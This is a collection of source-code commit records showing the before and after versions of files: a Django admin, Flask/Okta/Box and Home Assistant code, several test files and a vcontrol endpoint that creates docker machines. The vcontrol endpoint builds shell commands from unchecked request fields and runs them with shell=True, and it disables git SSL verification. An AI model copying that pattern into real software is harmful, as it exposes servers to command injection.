fieldset_basic = ('Basic Slide Info', {
'fields': [
'carousel',
'publication',
'title',
'subtitle',
'description',
'image',
'image_is_downloadable',
],
})
fieldset_article = ('Scientific Article Info', {
'fields': [
'pdf',
'pubmed_url',
'article_url',
'journal_name',
],
})
fieldset_page_link = ('Page Link', {
'fields': [
'page_link',
'page_link_label',
'page_link_color',
'page_link_anchor',
'page_link_target',
],
'classes': ['collapse'],
})
fieldset_other_url = ('Other URL', {
'fields': [
'other_url',
'other_url_label',
'other_url_color',
],
'classes': ['collapse'],
})
fieldset_publish = ('Publish Settings', {
'fields': [
'publish_slide',
'publish_datetime',
],
})
fieldsets = [
fieldset_basic,
fieldset_article,
fieldset_page_link,
fieldset_other_url,
fieldset_publish,
]
list_display = ['title', 'carousel', 'publish_slide', 'publish_datetime' ]
list_filter = [CarouselFilter, 'publish_slide', 'journal_name']
search_fields = ['title', 'subtitle', 'description']
admin.site.register(Slide, SlideAdmin)
admin.site.site_header = 'CMS Lab Carousel Administration'
| from django.contrib import admin
from cms_lab_carousel.models import Carousel, Slide
class CarouselAdmin(admin.ModelAdmin):
fieldset_frame = ('Carousel Frame', {
'fields': [
'title',
'header_image',
'footer_image',
],
})
fieldset_visibility = ('Visibility', {
'fields': [
'show_title',
'show_header',
'show_footer',
],
'classes': ['collapse'],
})
fieldset_slides = ('Slide Settings', {
'fields': [
'slider_height',
'slider_duration',
'slide_limit',
],
'classes': ['collapse'],
})
fieldsets = [
fieldset_frame,
fieldset_visibility,
fieldset_slides,
]
search_fields = ['title']
admin.site.register(Carousel, CarouselAdmin)
class CarouselFilter(admin.SimpleListFilter):
title = 'Carousel'
parameter_name = 'carousel'
def lookups(self, request, model_admin):
carousel_list = set([slide.carousel for slide in model_admin.model.objects.all()])
return [(carousel.id, carousel.title) for carousel in carousel_list]
def queryset(self, request, queryset):
if self.value():
return queryset.filter(carousel__id__exact=self.value())
else:
return queryset
class SlideAdmin(admin.ModelAdmin):
fieldset_basic = ('Basic Slide Info', {
'fields': [
'carousel',
'title',
'subtitle',
'description',
'image',
'image_is_downloadable',
],
})
fieldset_article = ('Scientific Article Info', {
'fields': [
'publication',
'pdf',
'pubmed_url',
'article_url',
'journal_name',
],
})
fieldset_page_link = ('Page Link', {
'fields': [
'page_link',
'page_link_label',
'page_link_color',
'page_link_anchor',
'page_link_target',
],
'classes': ['collapse'],
})
fieldset_other_url = ('Other URL', {
'fields': [
'other_url',
'other_url_label',
'other_url_color',
],
'classes': ['collapse'],
})
fieldset_publish = ('Publish Settings', {
'fields': [
'publish_slide',
'publish_datetime',
],
})
fieldsets = [
fieldset_basic,
fieldset_article,
fieldset_page_link,
fieldset_other_url,
fieldset_publish,
]
list_display = ['title', 'carousel', 'publish_slide', 'publish_datetime' ]
list_filter = [CarouselFilter, 'publish_slide', 'journal_name']
search_fields = ['title', 'subtitle', 'description']
admin.site.register(Slide, SlideAdmin)
admin.site.site_header = 'CMS Lab Carousel Administration'
| Python | 0 |
f61a4766ad3006bb2001df33d06feeb15352aa5a | Change Box user list request from raw API call to Box SDK make_request method | okta-integration/python/server.py | okta-integration/python/server.py | from flask import Flask, redirect, g, url_for
from flask_oidc import OpenIDConnect
from okta import UsersClient
from boxsdk import Client
from boxsdk import JWTAuth
import requests
import config
import json
app = Flask(__name__)
app.config.update({
'SECRET_KEY': config.okta_client_secret,
'OIDC_CLIENT_SECRETS': './client_secrets.json',
'OIDC_DEBUG': True,
'OIDC_ID_TOKEN_COOKIE_SECURE': False,
'OIDC_SCOPES': ["openid", "profile"],
'OIDC_CALLBACK_ROUTE': config.okta_callback_route
})
oidc = OpenIDConnect(app)
okta_client = UsersClient(config.okta_org_url, config.okta_auth_token)
# Fetch Okta user record if logged in
@app.before_request
def before_request():
if oidc.user_loggedin:
g.user = okta_client.get_user(oidc.user_getfield('sub'))
else:
g.user = None
# Main application route
@app.route('/')
def start():
return redirect(url_for(".box_auth"))
# Box user verification
@app.route("/box_auth")
@oidc.require_login
def box_auth():
uid = g.user.id
# Instantiate Box Client instance
auth = JWTAuth.from_settings_file('../config.json')
box_client = Client(auth)
# Validate is user exists
url = f'https://api.box.com/2.0/users?external_app_user_id={uid}'
response = box_client.make_request('GET', url)
user_info = response.json()
# If user not found, create user, otherwise fetch user token
if (user_info['total_count'] == 0):
user_name = f'{g.user.profile.firstName} {g.user.profile.lastName}'
space = 1073741824
# Create app user
user = box_client.create_user(user_name, None, space_amount=space, external_app_user_id=uid)
print('user {name} created')
else:
# Create user client based on discovered user
user = user_info['entries'][0]
user_to_impersonate = box_client.user(user_id=user['id'])
user_client = box_client.as_user(user_to_impersonate)
# Get current user
current_user = box_client.user().get()
print(current_user.id)
# Get all items in a folder
items = user_client.folder(folder_id='0').get_items()
for item in items:
print('{0} {1} is named "{2}"'.format(item.type.capitalize(), item.id, item.name))
return 'Test complete'
# User logout
@app.route("/logout")
def logout():
oidc.logout() | from flask import Flask, redirect, g, url_for
from flask_oidc import OpenIDConnect
from okta import UsersClient
from boxsdk import Client
from boxsdk import JWTAuth
import requests
import config
import json
app = Flask(__name__)
app.config.update({
'SECRET_KEY': config.okta_client_secret,
'OIDC_CLIENT_SECRETS': './client_secrets.json',
'OIDC_DEBUG': True,
'OIDC_ID_TOKEN_COOKIE_SECURE': False,
'OIDC_SCOPES': ["openid", "profile"],
'OIDC_CALLBACK_ROUTE': config.okta_callback_route
})
oidc = OpenIDConnect(app)
okta_client = UsersClient(config.okta_org_url, config.okta_auth_token)
# Fetch Okta user record if logged in
@app.before_request
def before_request():
if oidc.user_loggedin:
g.user = okta_client.get_user(oidc.user_getfield('sub'))
else:
g.user = None
# Main application route
@app.route('/')
def start():
return redirect(url_for(".box_auth"))
# Box user verification
@app.route("/box_auth")
@oidc.require_login
def box_auth():
uid = g.user.id
auth = JWTAuth.from_settings_file('../config.json')
access_token = auth.authenticate_instance()
box_client = Client(auth)
# Validate is user exists
url = f'https://api.box.com/2.0/users?external_app_user_id={uid}'
headers = {'Authorization': 'Bearer ' + access_token}
response = requests.get(url, headers=headers)
user_info = response.json()
# If user not found, create user, otherwise fetch user token
if (user_info['total_count'] == 0):
user_name = f'{g.user.profile.firstName} {g.user.profile.lastName}'
space = 1073741824
# Create app user
user = box_client.create_user(user_name, None, space_amount=space, external_app_user_id=uid)
print('user {name} created')
else:
# Create user client based on discovered user
user = user_info['entries'][0]
user_to_impersonate = box_client.user(user_id=user['id'])
user_client = box_client.as_user(user_to_impersonate)
# Get current user
current_user = box_client.user().get()
print(current_user.id)
# Get all items in a folder
items = user_client.folder(folder_id='0').get_items()
for item in items:
print('{0} {1} is named "{2}"'.format(item.type.capitalize(), item.id, item.name))
return 'Test complete'
# User logout
@app.route("/logout")
def logout():
oidc.logout()
| Python | 0 |
332cbbd8b1be773593037d293c5dabbf6c100199 | Migrate freedns tests from coroutine to async/await (#30390) | tests/components/freedns/test_init.py | tests/components/freedns/test_init.py | """Test the FreeDNS component."""
import pytest
from homeassistant.components import freedns
from homeassistant.setup import async_setup_component
from homeassistant.util.dt import utcnow
from tests.common import async_fire_time_changed
ACCESS_TOKEN = "test_token"
UPDATE_INTERVAL = freedns.DEFAULT_INTERVAL
UPDATE_URL = freedns.UPDATE_URL
@pytest.fixture
def setup_freedns(hass, aioclient_mock):
"""Fixture that sets up FreeDNS."""
params = {}
params[ACCESS_TOKEN] = ""
aioclient_mock.get(
UPDATE_URL, params=params, text="Successfully updated 1 domains."
)
hass.loop.run_until_complete(
async_setup_component(
hass,
freedns.DOMAIN,
{
freedns.DOMAIN: {
"access_token": ACCESS_TOKEN,
"scan_interval": UPDATE_INTERVAL,
}
},
)
)
async def test_setup(hass, aioclient_mock):
"""Test setup works if update passes."""
params = {}
params[ACCESS_TOKEN] = ""
aioclient_mock.get(
UPDATE_URL, params=params, text="ERROR: Address has not changed."
)
result = await async_setup_component(
hass,
freedns.DOMAIN,
{
freedns.DOMAIN: {
"access_token": ACCESS_TOKEN,
"scan_interval": UPDATE_INTERVAL,
}
},
)
assert result
assert aioclient_mock.call_count == 1
async_fire_time_changed(hass, utcnow() + UPDATE_INTERVAL)
await hass.async_block_till_done()
assert aioclient_mock.call_count == 2
async def test_setup_fails_if_wrong_token(hass, aioclient_mock):
"""Test setup fails if first update fails through wrong token."""
params = {}
params[ACCESS_TOKEN] = ""
aioclient_mock.get(UPDATE_URL, params=params, text="ERROR: Invalid update URL (2)")
result = await async_setup_component(
hass,
freedns.DOMAIN,
{
freedns.DOMAIN: {
"access_token": ACCESS_TOKEN,
"scan_interval": UPDATE_INTERVAL,
}
},
)
assert not result
assert aioclient_mock.call_count == 1
| """Test the FreeDNS component."""
import asyncio
import pytest
from homeassistant.components import freedns
from homeassistant.setup import async_setup_component
from homeassistant.util.dt import utcnow
from tests.common import async_fire_time_changed
ACCESS_TOKEN = "test_token"
UPDATE_INTERVAL = freedns.DEFAULT_INTERVAL
UPDATE_URL = freedns.UPDATE_URL
@pytest.fixture
def setup_freedns(hass, aioclient_mock):
"""Fixture that sets up FreeDNS."""
params = {}
params[ACCESS_TOKEN] = ""
aioclient_mock.get(
UPDATE_URL, params=params, text="Successfully updated 1 domains."
)
hass.loop.run_until_complete(
async_setup_component(
hass,
freedns.DOMAIN,
{
freedns.DOMAIN: {
"access_token": ACCESS_TOKEN,
"scan_interval": UPDATE_INTERVAL,
}
},
)
)
@asyncio.coroutine
def test_setup(hass, aioclient_mock):
"""Test setup works if update passes."""
params = {}
params[ACCESS_TOKEN] = ""
aioclient_mock.get(
UPDATE_URL, params=params, text="ERROR: Address has not changed."
)
result = yield from async_setup_component(
hass,
freedns.DOMAIN,
{
freedns.DOMAIN: {
"access_token": ACCESS_TOKEN,
"scan_interval": UPDATE_INTERVAL,
}
},
)
assert result
assert aioclient_mock.call_count == 1
async_fire_time_changed(hass, utcnow() + UPDATE_INTERVAL)
yield from hass.async_block_till_done()
assert aioclient_mock.call_count == 2
@asyncio.coroutine
def test_setup_fails_if_wrong_token(hass, aioclient_mock):
"""Test setup fails if first update fails through wrong token."""
params = {}
params[ACCESS_TOKEN] = ""
aioclient_mock.get(UPDATE_URL, params=params, text="ERROR: Invalid update URL (2)")
result = yield from async_setup_component(
hass,
freedns.DOMAIN,
{
freedns.DOMAIN: {
"access_token": ACCESS_TOKEN,
"scan_interval": UPDATE_INTERVAL,
}
},
)
assert not result
assert aioclient_mock.call_count == 1
| Python | 0 |
72941398fd2e78cbf5d994b4bf8683c4bdefaab9 | Comment out semipar notebook in travis runner until pip build us updated. | utils/travis_runner.py | utils/travis_runner.py | #!/usr/bin/env python
"""This script manages all tasks for the TRAVIS build server."""
import os
import subprocess
if __name__ == "__main__":
os.chdir("promotion/grmpy_tutorial_notebook")
cmd = [
"jupyter",
"nbconvert",
"--execute",
"grmpy_tutorial_notebook.ipynb",
"--ExecutePreprocessor.timeout=-1",
]
subprocess.check_call(cmd)
os.chdir("../..")
# if __name__ == "__main__":
# os.chdir("promotion/grmpy_tutorial_notebook")
# cmd = [
# "jupyter",
# "nbconvert",
# "--execute",
# "tutorial_semipar_notebook.ipynb",
# "--ExecutePreprocessor.timeout=-1",
# ]
# subprocess.check_call(cmd)
| #!/usr/bin/env python
"""This script manages all tasks for the TRAVIS build server."""
import os
import subprocess
if __name__ == "__main__":
os.chdir("promotion/grmpy_tutorial_notebook")
cmd = [
"jupyter",
"nbconvert",
"--execute",
"grmpy_tutorial_notebook.ipynb",
"--ExecutePreprocessor.timeout=-1",
]
subprocess.check_call(cmd)
os.chdir("../..")
if __name__ == "__main__":
os.chdir("promotion/grmpy_tutorial_notebook")
cmd = [
"jupyter",
"nbconvert",
"--execute",
"tutorial_semipar_notebook.ipynb",
"--ExecutePreprocessor.timeout=-1",
]
subprocess.check_call(cmd)
| Python | 0 |
1f2c175d00729902a953513436879b08a0e3baa3 | test must have broken with upgrade (change in random seed?) so this fixes it | tests/mep/genetics/test_chromosome.py | tests/mep/genetics/test_chromosome.py | import unittest
import random
from mep.genetics.gene import VariableGene, OperatorGene, Gene
from mep.genetics.chromosome import Chromosome
import numpy as np
class MockedGene(Gene):
def __init__(self, error_to_return):
"""
Initialize.
:param error_to_return: what to return in the evaluate
:type error_to_return: float
"""
self.error_to_return = error_to_return
def evaluate(self, gene_index, eval_matrix, data_matrix, constants, targets):
"""
Simple mocked version.
"""
return self.error_to_return
class TestChromosome(unittest.TestCase):
"""
Tests for the chromosome.
"""
def test_basic_random_construction(self):
"""
Basic example of a construction.
"""
# set the seed to keep it reproducible
random.seed(0)
# create the chromosome
num_genes = 2
num_constants = 1
chromosome = Chromosome.generate_random_chromosome(num_constants=num_constants, constants_min=1,
constants_max=10, constants_prob=0.2,
feature_variable_prob=0.3,
num_feature_variables=2, num_genes=num_genes,
operators_prob=0.5)
# confirm the number of genes and constants match what we expect
self.assertEqual(num_genes, len(chromosome.genes))
self.assertEqual(num_constants, len(chromosome.constants))
# the first gene has to be a variable gene; in particular it is this one
self.assertEqual(VariableGene(0, is_feature=False), chromosome.genes[0])
# the 2nd gene can be a variable or an operator; in this case it is the below
self.assertEqual(OperatorGene(Chromosome.operators_family[4](), 0, 0), chromosome.genes[1])
# verify constant
self.assertAlmostEqual(8.599796663725433, chromosome.constants[0])
def test_evaluate(self):
"""
Basic test of the evaluate method.
"""
# construct mocked genes
genes = [MockedGene(10), MockedGene(1)]
# construct chromosome
chromosome = Chromosome(genes, constants=[1, 2, 3])
# evaluate
chromosome.evaluate(np.zeros((2, 2)), targets=[20, 30])
# confirm the genes
self.assertEqual(genes[1], genes[chromosome.best_gene_index])
self.assertEqual(genes[1].error_to_return, chromosome.error)
def test_sort(self):
"""
Test the sort mechanism.
"""
# construct the chromosomes and test sorting them (by error)
min_chromosome, mid_chromosome, max_chromosome = Chromosome([], []), Chromosome([], []), Chromosome([], [])
min_chromosome.error = 1
mid_chromosome.error = 2
max_chromosome.error = 3
chromosomes = [mid_chromosome, max_chromosome, min_chromosome]
expected_chromosomes = [min_chromosome, mid_chromosome, max_chromosome]
# do the sort and verify
chromosomes.sort()
self.assertEqual(expected_chromosomes, chromosomes)
| import unittest
import random
from mep.genetics.gene import VariableGene, OperatorGene, Gene
from mep.genetics.chromosome import Chromosome
import numpy as np
class MockedGene(Gene):
def __init__(self, error_to_return):
"""
Initialize.
:param error_to_return: what to return in the evaluate
:type error_to_return: float
"""
self.error_to_return = error_to_return
def evaluate(self, gene_index, eval_matrix, data_matrix, constants, targets):
"""
Simple mocked version.
"""
return self.error_to_return
class TestChromosome(unittest.TestCase):
"""
Tests for the chromosome.
"""
def test_basic_random_construction(self):
"""
Basic example of a construction.
"""
# set the seed to keep it reproducible
random.seed(0)
# create the chromosome
num_genes = 2
num_constants = 1
chromosome = Chromosome.generate_random_chromosome(num_constants=num_constants, constants_min=1,
constants_max=10, constants_prob=0.2,
feature_variable_prob=0.3,
num_feature_variables=2, num_genes=num_genes,
operators_prob=0.5)
# confirm the number of genes and constants match what we expect
self.assertEquals(num_genes, len(chromosome.genes))
self.assertEquals(num_constants, len(chromosome.constants))
# the first gene has to be a variable gene; in particular it is this one
self.assertEquals(VariableGene(0, is_feature=False), chromosome.genes[0])
# the 2nd gene can be a variable or an operator; in this case it is the below
self.assertEquals(OperatorGene(Chromosome.operators_family[2](), 0, 0), chromosome.genes[1])
# verify constant
self.assertAlmostEquals(8.599796663725433, chromosome.constants[0])
def test_evaluate(self):
"""
Basic test of the evaluate method.
"""
# construct mocked genes
genes = [MockedGene(10), MockedGene(1)]
# construct chromosome
chromosome = Chromosome(genes, constants=[1, 2, 3])
# evaluate
chromosome.evaluate(np.zeros((2, 2)), targets=[20, 30])
# confirm the genes
self.assertEqual(genes[1], genes[chromosome.best_gene_index])
self.assertEqual(genes[1].error_to_return, chromosome.error)
def test_sort(self):
"""
Test the sort mechanism.
"""
# construct the chromosomes and test sorting them (by error)
min_chromosome, mid_chromosome, max_chromosome = Chromosome([], []), Chromosome([], []), Chromosome([], [])
min_chromosome.error = 1
mid_chromosome.error = 2
max_chromosome.error = 3
chromosomes = [mid_chromosome, max_chromosome, min_chromosome]
expected_chromosomes = [min_chromosome, mid_chromosome, max_chromosome]
# do the sort and verify
chromosomes.sort()
self.assertEqual(expected_chromosomes, chromosomes)
| Python | 0 |
17dfc3faa45584200c8f67686b86b541a2ce01fe | Test for informal word | revscoring/languages/tests/test_hebrew.py | revscoring/languages/tests/test_hebrew.py | from nose.tools import eq_
from .. import language, hebrew
def test_language():
is_misspelled = hebrew.solve(language.is_misspelled)
assert is_misspelled("חטול")
assert not is_misspelled("חתול")
is_badword = hebrew.solve(language.is_badword)
assert is_badword("שרמוטה")
assert not is_badword("שימרותה")
is_informal_word = hebrew.solve(language.is_informal_word)
assert is_informal_word("בגללך")
assert not is_informal_word("בגלל")
| from nose.tools import eq_
from .. import language, hebrew
def test_language():
is_misspelled = hebrew.solve(language.is_misspelled)
assert is_misspelled("חטול")
assert not is_misspelled("חתול")
is_badword = hebrew.solve(language.is_badword)
assert is_badword("שרמוטה")
assert not is_badword("שימרותה")
| Python | 0.000037 |
1b75a0e5ee01387c434922b9d0fd23705cbafe9b | Allow empty enums for `OneOf` | marshmallow_jsonschema/validation.py | marshmallow_jsonschema/validation.py | from marshmallow import fields
from .exceptions import UnsupportedValueError
def handle_length(schema, field, validator, parent_schema):
"""Adds validation logic for ``marshmallow.validate.Length``, setting the
values appropriately for ``fields.List``, ``fields.Nested``, and
``fields.String``.
Args:
schema (dict): The original JSON schema we generated. This is what we
want to post-process.
field (fields.Field): The field that generated the original schema and
who this post-processor belongs to.
validator (marshmallow.validate.Length): The validator attached to the
passed in field.
parent_schema (marshmallow.Schema): The Schema instance that the field
belongs to.
Returns:
dict: A, possibly, new JSON Schema that has been post processed and
altered.
Raises:
UnsupportedValueError: Raised if the `field` is something other than
`fields.List`, `fields.Nested`, or `fields.String`
"""
if isinstance(field, fields.String):
minKey = "minLength"
maxKey = "maxLength"
elif isinstance(field, (fields.List, fields.Nested)):
minKey = "minItems"
maxKey = "maxItems"
else:
raise UnsupportedValueError(
"In order to set the Length validator for JSON "
"schema, the field must be either a List, Nested or a String"
)
if validator.min:
schema[minKey] = validator.min
if validator.max:
schema[maxKey] = validator.max
if validator.equal:
schema[minKey] = validator.equal
schema[maxKey] = validator.equal
return schema
def handle_one_of(schema, field, validator, parent_schema):
"""Adds the validation logic for ``marshmallow.validate.OneOf`` by setting
the JSONSchema `enum` property to the allowed choices in the validator.
Args:
schema (dict): The original JSON schema we generated. This is what we
want to post-process.
field (fields.Field): The field that generated the original schema and
who this post-processor belongs to.
validator (marshmallow.validate.OneOf): The validator attached to the
passed in field.
parent_schema (marshmallow.Schema): The Schema instance that the field
belongs to.
Returns:
dict: New JSON Schema that has been post processed and
altered.
"""
schema["enum"] = list(validator.choices)
schema["enumNames"] = list(validator.labels)
return schema
def handle_range(schema, field, validator, parent_schema):
"""Adds validation logic for ``marshmallow.validate.Range``, setting the
values appropriately ``fields.Number`` and it's subclasses.
Args:
schema (dict): The original JSON schema we generated. This is what we
want to post-process.
field (fields.Field): The field that generated the original schema and
who this post-processor belongs to.
validator (marshmallow.validate.Length): The validator attached to the
passed in field.
parent_schema (marshmallow.Schema): The Schema instance that the field
belongs to.
Returns:
dict: A, possibly, new JSON Schema that has been post processed and
altered.
"""
if not isinstance(field, fields.Number):
return schema
if validator.min:
schema["minimum"] = validator.min
if validator.max:
schema["maximum"] = validator.max
return schema
| from marshmallow import fields
from .exceptions import UnsupportedValueError
def handle_length(schema, field, validator, parent_schema):
"""Adds validation logic for ``marshmallow.validate.Length``, setting the
values appropriately for ``fields.List``, ``fields.Nested``, and
``fields.String``.
Args:
schema (dict): The original JSON schema we generated. This is what we
want to post-process.
field (fields.Field): The field that generated the original schema and
who this post-processor belongs to.
validator (marshmallow.validate.Length): The validator attached to the
passed in field.
parent_schema (marshmallow.Schema): The Schema instance that the field
belongs to.
Returns:
dict: A, possibly, new JSON Schema that has been post processed and
altered.
Raises:
UnsupportedValueError: Raised if the `field` is something other than
`fields.List`, `fields.Nested`, or `fields.String`
"""
if isinstance(field, fields.String):
minKey = "minLength"
maxKey = "maxLength"
elif isinstance(field, (fields.List, fields.Nested)):
minKey = "minItems"
maxKey = "maxItems"
else:
raise UnsupportedValueError(
"In order to set the Length validator for JSON "
"schema, the field must be either a List, Nested or a String"
)
if validator.min:
schema[minKey] = validator.min
if validator.max:
schema[maxKey] = validator.max
if validator.equal:
schema[minKey] = validator.equal
schema[maxKey] = validator.equal
return schema
def handle_one_of(schema, field, validator, parent_schema):
"""Adds the validation logic for ``marshmallow.validate.OneOf`` by setting
the JSONSchema `enum` property to the allowed choices in the validator.
Args:
schema (dict): The original JSON schema we generated. This is what we
want to post-process.
field (fields.Field): The field that generated the original schema and
who this post-processor belongs to.
validator (marshmallow.validate.OneOf): The validator attached to the
passed in field.
parent_schema (marshmallow.Schema): The Schema instance that the field
belongs to.
Returns:
dict: A, possibly, new JSON Schema that has been post processed and
altered.
"""
if validator.choices:
schema["enum"] = list(validator.choices)
schema["enumNames"] = list(validator.labels)
return schema
def handle_range(schema, field, validator, parent_schema):
"""Adds validation logic for ``marshmallow.validate.Range``, setting the
values appropriately ``fields.Number`` and it's subclasses.
Args:
schema (dict): The original JSON schema we generated. This is what we
want to post-process.
field (fields.Field): The field that generated the original schema and
who this post-processor belongs to.
validator (marshmallow.validate.Length): The validator attached to the
passed in field.
parent_schema (marshmallow.Schema): The Schema instance that the field
belongs to.
Returns:
dict: A, possibly, new JSON Schema that has been post processed and
altered.
"""
if not isinstance(field, fields.Number):
return schema
if validator.min:
schema["minimum"] = validator.min
if validator.max:
schema["maximum"] = validator.max
return schema
| Python | 0.000011 |
eb71d45097e509273518b83113489911bf985e4a | clean up | mcpipy/test/builders/test_protein.py | mcpipy/test/builders/test_protein.py | import pandas as pd
from cellcraft.builders.protein import define_items_color_texture_protein, store_location_biological_prot_data
def test_define_items_color_texture_protein():
dict_chains = {"a": 1, "b": 2}
d_appearance = define_items_color_texture_protein(dict_chains)
assert len(d_appearance) == 2
assert d_appearance[1]['color'] != d_appearance[2]['color']
| import pandas as pd
from cellcraft.builders.protein import define_items_color_texture_protein, store_location_biological_prot_data
def test_define_items_color_texture_protein():
dict_chains = {"a": 1, "b": 2}
d_appearance = define_items_color_texture_protein(dict_chains)
assert len(d_appearance) == 2
assert d_appearance[1]['color'] != d_appearance[2]['color']
def test_store_location_biological_prot_data():
complex_coordinates = pd.Series([0.03, 0.45, 0.23])
name = '1jsu'
data_dict = store_location_biological_prot_data(complex_coordinates, name) | Python | 0.000001 |
237f85009e2d8669e75c1e7e9ae3940efe7a151d | update vetn version and pull recursively | vcontrol/rest/machines/create.py | vcontrol/rest/machines/create.py | from ..helpers import get_allowed
import ast
import json
import os
import subprocess
import web
class CreateMachineR:
"""
This endpoint is for creating a new machine of Vent on a provider.
"""
allow_origin, rest_url = get_allowed.get_allowed()
def OPTIONS(self):
return self.POST()
def POST(self):
web.header('Access-Control-Allow-Origin', self.allow_origin)
web.header('Access-Control-Allow-Headers', "Content-type")
data = web.data()
payload = {}
try:
payload = ast.literal_eval(data)
if type(payload) != dict:
payload = ast.literal_eval(json.loads(data))
except:
return "malformed json body"
# TODO add --engine-label(s) vent specific labels
engine_labels = "--engine-label vcontrol_managed=yes "
try:
if os.path.isfile('providers.txt'):
with open('providers.txt', 'r') as f:
for line in f:
if line.split(":")[0] == payload['provider']:
# add --engine-label for group specified in payload
if "group" in payload:
engine_labels += "--engine-label vcontrol_group="+payload["group"]+" "
# !! TODO add any additional --engine-label(s) in payload
if "labels" in payload:
if payload["labels"] != "":
labels = payload["labels"].split(",")
for label in labels:
engine_labels += "--engine-label "+label+" "
proc = None
cleanup = False
if line.split(":")[1] == 'openstack' or line.split(":")[1] == 'vmwarevsphere':
# TODO check usage stats first and make sure it's not over the limits (capacity)
cmd = "/usr/local/bin/docker-machine create "+engine_labels+"-d "+line.split(":")[1]+" "+line.split(":")[5].strip()
if line.split(":")[1] == 'vmwarevsphere':
if payload['iso'] == '/tmp/vent/vent.iso':
cmd += ' --vmwarevsphere-boot2docker-url=https://github.com/CyberReboot/vent/releases/download/v0.1.1/vent.iso'
else:
cmd += ' --vmwarevsphere-boot2docker-url='+payload['iso']
elif line.split(":")[1].strip() == "virtualbox":
cmd = "/usr/local/bin/docker-machine create "+engine_labels+"-d "+line.split(":")[1].strip()
if payload['iso'] == '/tmp/vent/vent.iso':
if not os.path.isfile('/tmp/vent/vent.iso'):
cleanup = True
os.system("git config --global http.sslVerify false")
os.system("cd /tmp && git clone --recursive https://github.com/CyberReboot/vent.git")
os.system("cd /tmp/vent && make")
proc = subprocess.Popen(["nohup", "python", "-m", "SimpleHTTPServer"], cwd="/tmp/vent")
cmd += ' --virtualbox-boot2docker-url=http://localhost:8000/vent.iso'
cmd += ' --virtualbox-cpu-count "'+str(payload['cpus'])+'" --virtualbox-disk-size "'+str(payload['disk_size'])+'" --virtualbox-memory "'+str(payload['memory'])+'"'
else:
cmd = "/usr/local/bin/docker-machine create "+engine_labels+"-d "+line.split(":")[1]+" "+line.split(":")[2].strip()
if line.split(":")[1] == "vmwarevsphere":
cmd += ' --vmwarevsphere-cpu-count "'+str(payload['cpus'])+'" --vmwarevsphere-disk-size "'+str(payload['disk_size'])+'" --vmwarevsphere-memory-size "'+str(payload['memory'])+'"'
cmd += ' '+payload['machine']
output = subprocess.check_output(cmd, shell=True)
if proc != None:
os.system("kill -9 "+str(proc.pid))
if cleanup:
shutil.rmtree('/tmp/vent')
return output
return "provider specified was not found"
else:
return "no providers, please first add a provider"
except:
return "unable to create machine"
| from ..helpers import get_allowed
import ast
import json
import os
import subprocess
import web
class CreateMachineR:
"""
This endpoint is for creating a new machine of Vent on a provider.
"""
allow_origin, rest_url = get_allowed.get_allowed()
def OPTIONS(self):
return self.POST()
def POST(self):
web.header('Access-Control-Allow-Origin', self.allow_origin)
web.header('Access-Control-Allow-Headers', "Content-type")
data = web.data()
payload = {}
try:
payload = ast.literal_eval(data)
if type(payload) != dict:
payload = ast.literal_eval(json.loads(data))
except:
return "malformed json body"
# TODO add --engine-label(s) vent specific labels
engine_labels = "--engine-label vcontrol_managed=yes "
try:
if os.path.isfile('providers.txt'):
with open('providers.txt', 'r') as f:
for line in f:
if line.split(":")[0] == payload['provider']:
# add --engine-label for group specified in payload
if "group" in payload:
engine_labels += "--engine-label vcontrol_group="+payload["group"]+" "
# !! TODO add any additional --engine-label(s) in payload
if "labels" in payload:
if payload["labels"] != "":
labels = payload["labels"].split(",")
for label in labels:
engine_labels += "--engine-label "+label+" "
proc = None
cleanup = False
if line.split(":")[1] == 'openstack' or line.split(":")[1] == 'vmwarevsphere':
# TODO check usage stats first and make sure it's not over the limits (capacity)
cmd = "/usr/local/bin/docker-machine create "+engine_labels+"-d "+line.split(":")[1]+" "+line.split(":")[5].strip()
if line.split(":")[1] == 'vmwarevsphere':
if payload['iso'] == '/tmp/vent/vent.iso':
cmd += ' --vmwarevsphere-boot2docker-url=https://github.com/CyberReboot/vent/releases/download/v0.1.0/vent.iso'
else:
cmd += ' --vmwarevsphere-boot2docker-url='+payload['iso']
elif line.split(":")[1].strip() == "virtualbox":
cmd = "/usr/local/bin/docker-machine create "+engine_labels+"-d "+line.split(":")[1].strip()
if payload['iso'] == '/tmp/vent/vent.iso':
if not os.path.isfile('/tmp/vent/vent.iso'):
cleanup = True
os.system("git config --global http.sslVerify false")
os.system("cd /tmp && git clone https://github.com/CyberReboot/vent.git")
os.system("cd /tmp/vent && make")
proc = subprocess.Popen(["nohup", "python", "-m", "SimpleHTTPServer"], cwd="/tmp/vent")
cmd += ' --virtualbox-boot2docker-url=http://localhost:8000/vent.iso'
cmd += ' --virtualbox-cpu-count "'+str(payload['cpus'])+'" --virtualbox-disk-size "'+str(payload['disk_size'])+'" --virtualbox-memory "'+str(payload['memory'])+'"'
else:
cmd = "/usr/local/bin/docker-machine create "+engine_labels+"-d "+line.split(":")[1]+" "+line.split(":")[2].strip()
if line.split(":")[1] == "vmwarevsphere":
cmd += ' --vmwarevsphere-cpu-count "'+str(payload['cpus'])+'" --vmwarevsphere-disk-size "'+str(payload['disk_size'])+'" --vmwarevsphere-memory-size "'+str(payload['memory'])+'"'
cmd += ' '+payload['machine']
output = subprocess.check_output(cmd, shell=True)
if proc != None:
os.system("kill -9 "+str(proc.pid))
if cleanup:
shutil.rmtree('/tmp/vent')
return output
return "provider specified was not found"
else:
return "no providers, please first add a provider"
except:
return "unable to create machine"
| Python | 0 |
be929d518ff320ed8e16f57da55f0855800f7408 | Use mutli_reduce instead of reduce in enum file loading | src/engine/file_loader.py | src/engine/file_loader.py | import os
import json
from lib import contract, functional
data_dir = os.path.join(os.environ['PORTER'], 'data')
@contract.accepts(str)
@contract.returns(list)
def read_and_parse_json(data_type):
sub_dir = os.path.join(data_dir, data_type)
def full_path(file_name):
return os.path.join(sub_dir, file_name)
def only_json(file_name):
return file_name.endswith('.json')
def load_json(json_file_name):
with open(json_file_name) as json_file:
return json.load(json_file)
return map(load_json, filter(only_json, map(full_path, os.listdir(sub_dir))))
@contract.accepts(str)
@contract.returns(dict)
def load_enum(struct_name):
def create_enum_map(enum_map, enumeration, enum_type):
enum_map[str(enum_type)] = enumeration
return enum_map
return functional.multi_reduce(
create_enum_map, enumerate(read_and_parse_json(struct_name)[0]), {})
@contract.accepts(str)
@contract.returns(dict)
def load_struct(struct_name):
def create_struct_map(struct_map, struct_):
struct_map[str(struct_['name'])] = struct_
return struct_map
return reduce(create_struct_map, read_and_parse_json(struct_name), {})
| import os
import json
from lib import contract
data_dir = os.path.join(os.environ['PORTER'], 'data')
@contract.accepts(str)
@contract.returns(list)
